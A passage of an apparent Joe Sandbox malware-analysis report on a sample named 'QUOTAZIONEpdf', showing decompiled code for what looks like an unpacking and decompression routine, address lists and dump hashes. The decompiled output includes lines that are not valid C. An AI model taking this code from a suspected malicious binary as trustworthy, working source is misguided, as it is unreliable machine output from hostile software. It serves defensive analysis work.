											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                0x00000000
                0x00406682
                0x00406682
                0x00406686
                0x004066ab
                0x004066b5
                0x00000000
                0x00406688
                0x00406688
                0x0040668b
                0x0040668f
                0x00406692
                0x00406695
                0x00406699
                0x00406699
                0x0040669c
                0x00406776
                0x00406776
                0x0040677d
                0x0040677d
                0x00406780
                0x00406787
                0x004067b4
                0x004067b8
                0x00406818
                0x0040681b
                0x00406820
                0x00406821
                0x00406823
                0x00406825
                0x00406828
                0x00406734
                0x00406734
                0x00406734
                0x00405ed0
                0x00405ed0
                0x00405ed0
                0x00405ed9
                0x00000000
                0x00000000
                0x00405edf
                0x00000000
                0x00405eea
                0x00000000
                0x00000000
                0x00405ef3
                0x00405ef6
                0x00405ef9
                0x00405efd
                0x00000000
                0x00000000
                0x00405f03
                0x00405f06
                0x00405f08
                0x00405f09
                0x00405f0c
                0x00405f0e
                0x00405f0f
                0x00405f11
                0x00405f14
                0x00405f19
                0x00405f1e
                0x00405f27
                0x00405f3a
                0x00405f3d
                0x00405f49
                0x00405f71
                0x00405f73
                0x00405f81
                0x00405f81
                0x00405f85
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405f75
                0x00405f75
                0x00405f78
                0x00405f79
                0x00405f79
                0x00000000
                0x00405f75
                0x00405f4f
                0x00405f54
                0x00405f54
                0x00405f5d
                0x00405f65
                0x00405f68
                0x00000000
                0x00405f6e
                0x00405f6e
                0x00000000
                0x00405f6e
                0x00000000
                0x00405f8b
                0x00405f8b
                0x00405f8f
                0x0040683b
                0x00000000
                0x0040683b
                0x00405f98
                0x00405fa8
                0x00405fab
                0x00405fae
                0x00405fae
                0x00405fae
                0x00405fb1
                0x00405fb5
                0x00000000
                0x00000000
                0x00405fb7
                0x00405fbd
                0x00405fe7
                0x00405fed
                0x00405ff4
                0x00000000
                0x00405ff4
                0x00405fc3
                0x00405fc6
                0x00405fcb
                0x00405fcb
                0x00405fd6
                0x00405fde
                0x00405fe1
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406026
                0x0040602c
                0x0040602f
                0x0040603c
                0x00406044
                0x00000000
                0x00000000
                0x00405ffb
                0x00405ffb
                0x00405fff
                0x0040684a
                0x00000000
                0x0040684a
                0x0040600b
                0x00406016
                0x00406016
                0x00406016
                0x00406019
                0x0040601c
                0x0040601f
                0x00406024
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004066bb
                0x004066bb
                0x004066c1
                0x004066c7
                0x004066cd
                0x004066e7
                0x004066ea
                0x004066f0
                0x004066fb
                0x004066fb
                0x004066fd
                0x004066cf
                0x004066cf
                0x004066de
                0x004066e2
                0x004066e2
                0x00406707
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406709
                0x0040670d
                0x004068bc
                0x00000000
                0x004068bc
                0x00406719
                0x00406720
                0x00406728
                0x0040672b
                0x0040672e
                0x0040672e
                0x00000000
                0x00000000
                0x0040604c
                0x0040604e
                0x00406051
                0x004060c2
                0x004060c5
                0x004060c8
                0x004060cf
                0x004060d9
                0x00000000
                0x004060d9
                0x00406053
                0x00406057
                0x0040605a
                0x0040605c
                0x0040605f
                0x00406062
                0x00406064
                0x00406067
                0x00406069
                0x0040606e
                0x00406071
                0x00406074
                0x00406078
                0x0040607f
                0x00406082
                0x00406089
                0x0040608d
                0x00406095
                0x00406095
                0x00406095
                0x0040608f
                0x0040608f
                0x0040608f
                0x00406084
                0x00406084
                0x00406084
                0x00406099
                0x0040609c
                0x004060ba
                0x004060bc
                0x00000000
                0x0040609e
                0x0040609e
                0x004060a1
                0x004060a4
                0x004060a7
                0x004060a9
                0x004060a9
                0x004060a9
                0x004060ac
                0x004060af
                0x004060b1
                0x004060b2
                0x004060b5
                0x00000000
                0x004060b5
                0x00000000
                0x004062eb
                0x004062ef
                0x0040630d
                0x00406310
                0x00406317
                0x0040631a
                0x0040631d
                0x00406320
                0x00406323
                0x00406326
                0x00406328
                0x0040632f
                0x00406330
                0x00406332
                0x00406335
                0x00406338
                0x0040633b
                0x0040633b
                0x00406340
                0x00000000
                0x00406340
                0x004062f1
                0x004062f4
                0x004062f7
                0x00406301
                0x00000000
                0x00000000
                0x00406355
                0x00406359
                0x0040637c
                0x0040637f
                0x00406382
                0x0040638c
                0x0040635b
                0x0040635b
                0x0040635e
                0x00406361
                0x00406364
                0x00406371
                0x00406374
                0x00406374
                0x00000000
                0x00000000
                0x00406398
                0x0040639c
                0x00000000
                0x00000000
                0x004063a2
                0x004063a6
                0x00000000
                0x00000000
                0x004063ac
                0x004063ae
                0x004063b2
                0x004063b2
                0x004063b5
                0x004063b9
                0x00000000
                0x00000000
                0x00406409
                0x0040640d
                0x00406414
                0x00406417
                0x0040641a
                0x00406424
                0x00000000
                0x00406424
                0x0040640f
                0x00000000
                0x00000000
                0x00406430
                0x00406434
                0x0040643b
                0x0040643e
                0x00406441
                0x00406436
                0x00406436
                0x00406436
                0x00406444
                0x00406447
                0x0040644a
                0x0040644a
                0x0040644d
                0x00406450
                0x00406453
                0x00406453
                0x00406456
                0x0040645d
                0x00406462
                0x00000000
                0x00000000
                0x004064f0
                0x004064f0
                0x004064f4
                0x00406892
                0x00000000
                0x00406892
                0x004064fa
                0x004064fd
                0x00406500
                0x00406504
                0x00406507
                0x0040650d
                0x0040650f
                0x0040650f
                0x0040650f
                0x00406512
                0x00406515
                0x00000000
                0x00000000
                0x004060e5
                0x004060e5
                0x004060e9
                0x00406856
                0x00000000
                0x00406856
                0x004060ef
                0x004060f2
                0x004060f5
                0x004060f9
                0x004060fc
                0x00406102
                0x00406104
                0x00406104
                0x00406104
                0x00406107
                0x0040610a
                0x0040610a
                0x0040610d
                0x00406110
                0x00000000
                0x00000000
                0x00406116
                0x0040611c
                0x00000000
                0x00000000
                0x00406122
                0x00406122
                0x00406126
                0x00406129
                0x0040612c
                0x0040612f
                0x00406132
                0x00406133
                0x00406136
                0x00406138
                0x0040613e
                0x00406141
                0x00406144
                0x00406147
                0x0040614a
                0x0040614d
                0x00406150
                0x0040616c
                0x0040616f
                0x00406172
                0x00406175
                0x0040617c
                0x00406180
                0x00406182
                0x00406186
                0x00406152
                0x00406152
                0x00406156
                0x0040615e
                0x00406163
                0x00406165
                0x00406167
                0x00406167
                0x00406189
                0x00406190
                0x00406193
                0x00000000
                0x00406199
                0x00000000
                0x00406199
                0x00000000
                0x0040619e
                0x0040619e
                0x004061a2
                0x00406862
                0x00000000
                0x00406862
                0x004061a8
                0x004061ab
                0x004061ae
                0x004061b2
                0x004061b5
                0x004061bb
                0x004061bd
                0x004061bd
                0x004061bd
                0x004061c0
                0x004061c3
                0x004061c3
                0x004061c3
                0x004061c9
                0x00000000
                0x00000000
                0x004061cb
                0x004061ce
                0x004061d1
                0x004061d4
                0x004061d7
                0x004061da
                0x004061dd
                0x004061e0
                0x004061e3
                0x004061e6
                0x004061e9
                0x00406201
                0x00406204
                0x00406207
                0x0040620a
                0x0040620a
                0x0040620d
                0x00406211
                0x00406213
                0x004061eb
                0x004061eb
                0x004061f3
                0x004061f8
                0x004061fa
                0x004061fc
                0x004061fc
                0x00406216
                0x0040621d
                0x00406220
                0x00000000
                0x00406222
                0x00000000
                0x00406222
                0x00406220
                0x00406227
                0x00406227
                0x00406227
                0x00406227
                0x00000000
                0x00000000
                0x00406262
                0x00406262
                0x00406266
                0x0040686e
                0x00000000
                0x0040686e
                0x0040626c
                0x0040626f
                0x00406272
                0x00406276
                0x00406279
                0x0040627f
                0x00406281
                0x00406281
                0x00406281
                0x00406284
                0x00406287
                0x00406287
                0x0040628d
                0x0040622b
                0x0040622b
                0x0040622e
                0x00000000
                0x0040622e
                0x0040628f
                0x0040628f
                0x00406292
                0x00406295
                0x00406298
                0x0040629b
                0x0040629e
                0x004062a1
                0x004062a4
                0x004062a7
                0x004062aa
                0x004062ad
                0x004062c5
                0x004062c8
                0x004062cb
                0x004062ce
                0x004062ce
                0x004062d1
                0x004062d5
                0x004062d7
                0x004062af
                0x004062af
                0x004062b7
                0x004062bc
                0x004062be
                0x004062c0
                0x004062c0
                0x004062da
                0x004062e1
                0x004062e4
                0x00000000
                0x004062e6
                0x00000000
                0x004062e6
                0x00000000
                0x00406573
                0x00406573
                0x00406577
                0x0040689e
                0x00000000
                0x0040689e
                0x0040657d
                0x00406580
                0x00406583
                0x00406587
                0x0040658a
                0x00406590
                0x00406592
                0x00406592
                0x00406592
                0x00406595
                0x00000000
                0x00000000
                0x00406343
                0x00406343
                0x00406346
                0x004066b8
                0x004066b8
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040673f
                0x00406743
                0x00406761
                0x00406761
                0x00406761
                0x00406768
                0x0040676f
                0x00000000
                0x0040676f
                0x00406745
                0x00406748
                0x0040674b
                0x0040674e
                0x00406755
                0x00000000
                0x00000000
                0x00406830
                0x00406833
                0x00406734
                0x00406734
                0x00000000
                0x00000000
                0x0040646a
                0x0040646c
                0x00406473
                0x00406474
                0x00406476
                0x00406479
                0x00000000
                0x00000000
                0x00406481
                0x00406484
                0x00406487
                0x00406489
                0x0040648b
                0x0040648b
                0x0040648c
                0x0040648f
                0x00406496
                0x00406499
                0x004064a7
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040678c
                0x0040678c
                0x00406790
                0x004068c8
                0x00000000
                0x004068c8
                0x00406796
                0x00406799
                0x0040679c
                0x004067a0
                0x004067a3
                0x004067a9
                0x004067ab
                0x004067ab
                0x004067ab
                0x004067ae
                0x004067b1
                0x004067b1
                0x004067b1
                0x004067b1
                0x00000000
                0x00000000
                0x004064af
                0x004064b2
                0x004064e8
                0x00406618
                0x00406618
                0x00406618
                0x00406618
                0x0040661b
                0x0040661b
                0x0040661e
                0x00406620
                0x004068aa
                0x00000000
                0x004068aa
                0x00406626
                0x00406629
                0x00000000
                0x00000000
                0x0040662f
                0x00406633
                0x00406636
                0x00406636
                0x00406636
                0x00000000
                0x00406636
                0x004064b4
                0x004064b6
                0x004064b8
                0x004064ba
                0x004064bd
                0x004064be
                0x004064c0
                0x004064c2
                0x004064c5
                0x004064c8
                0x004064de
                0x004064e3
                0x0040651b
                0x0040651b
                0x0040651f
                0x0040654b
                0x0040654d
                0x00406554
                0x00406557
                0x0040655a
                0x0040655a
                0x0040655f
                0x0040655f
                0x00406561
                0x00406564
                0x0040656b
                0x0040656e
                0x0040659b
                0x0040659b
                0x0040659e
                0x004065a1
                0x00406615
                0x00406615
                0x00406615
                0x00000000
                0x00406615
                0x004065a3
                0x004065a9
                0x004065ac
                0x004065af
                0x004065b2
                0x004065b5
                0x004065b8
                0x004065bb
                0x004065be
                0x004065c1
                0x004065c4
                0x004065dd
                0x004065df
                0x004065e2
                0x004065e3
                0x004065e6
                0x004065e8
                0x004065eb
                0x004065ed
                0x004065ef
                0x004065f2
                0x004065f4
                0x004065f7
                0x004065fb
                0x004065fd
                0x004065fd
                0x004065fe
                0x00406601
                0x00406604
                0x004065c6
                0x004065c6
                0x004065ce
                0x004065d3
                0x004065d5
                0x004065d8
                0x004065d8
                0x00406607
                0x0040660e
                0x00406598
                0x00406598
                0x00406598
                0x00406598
                0x00000000
                0x00406610
                0x00000000
                0x00406610
                0x0040660e
                0x00406521
                0x00406524
                0x00406526
                0x00406529
                0x0040652c
                0x0040652f
                0x00406531
                0x00406534
                0x00406537
                0x00406537
                0x0040653a
                0x0040653a
                0x0040653d
                0x00406544
                0x00406518
                0x00406518
                0x00406518
                0x00406518
                0x00000000
                0x00406546
                0x00000000
                0x00406546
                0x00406544
                0x004064ca
                0x004064cd
                0x004064cf
                0x004064d2
                0x00000000
                0x00000000
                0x00406231
                0x00406231
                0x00406235
                0x0040687a
                0x00000000
                0x0040687a
                0x0040623b
                0x0040623e
                0x00406241
                0x00406244
                0x00406247
                0x0040624a
                0x0040624d
                0x0040624f
                0x00406252
                0x00406255
                0x00406258
                0x0040625a
                0x0040625a
                0x0040625a
                0x00000000
                0x00000000
                0x004063bc
                0x004063bc
                0x004063c0
                0x00406886
                0x00000000
                0x00406886
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d1
                0x004063d1
                0x004063d1
                0x004063d4
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e3
                0x004063e4
                0x004063e6
                0x004063e6
                0x004063e6
                0x004063e9
                0x004063ec
                0x004063ef
                0x004063f2
                0x004063f2
                0x004063f2
                0x004063f5
                0x004063f7
                0x004063f7
                0x00000000
                0x00000000
                0x00406639
                0x00406639
                0x00406639
                0x0040663d
                0x00000000
                0x00000000
                0x00406643
                0x00406646
                0x00406649
                0x0040664c
                0x0040664e
                0x0040664e
                0x0040664e
                0x00406651
                0x00406654
                0x00406657
                0x0040665a
                0x0040665d
                0x00406660
                0x00406661
                0x00406663
                0x00406663
                0x00406663
                0x00406666
                0x00406669
                0x0040666c
                0x0040666f
                0x00406672
                0x00406676
                0x00406678
                0x0040667b
                0x00000000
                0x0040667d
                0x004063fa
                0x004063fa
                0x00000000
                0x004063fa
                0x0040667b
                0x004068b0
                0x004068d2
                0x004068d8
                0x004068da
                0x004068e1
                0x004068e3
                0x004068ea
                0x004068ee
                0x00000000
                0x00405edf
                0x004068e7
                0x004068e7
                0x00000000
                0x004068e7
                0x00406734
                0x004067ba
                0x004067c0
                0x004067c3
                0x004067c6
                0x004067c9
                0x004067cc
                0x004067cf
                0x004067d2
                0x004067d5
                0x004067db
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fd
                0x00406801
                0x00406803
                0x00406804
                0x00406807
                0x004067dd
                0x004067dd
                0x004067e5
                0x004067ea
                0x004067ec
                0x004067ef
                0x004067ef
                0x00406811
                0x00000000
                0x00406813
                0x00000000
                0x00406813
                0x00406811
                0x00000000
                0x00406686

                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                • Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
                • Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                • Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406398, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E00406398() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
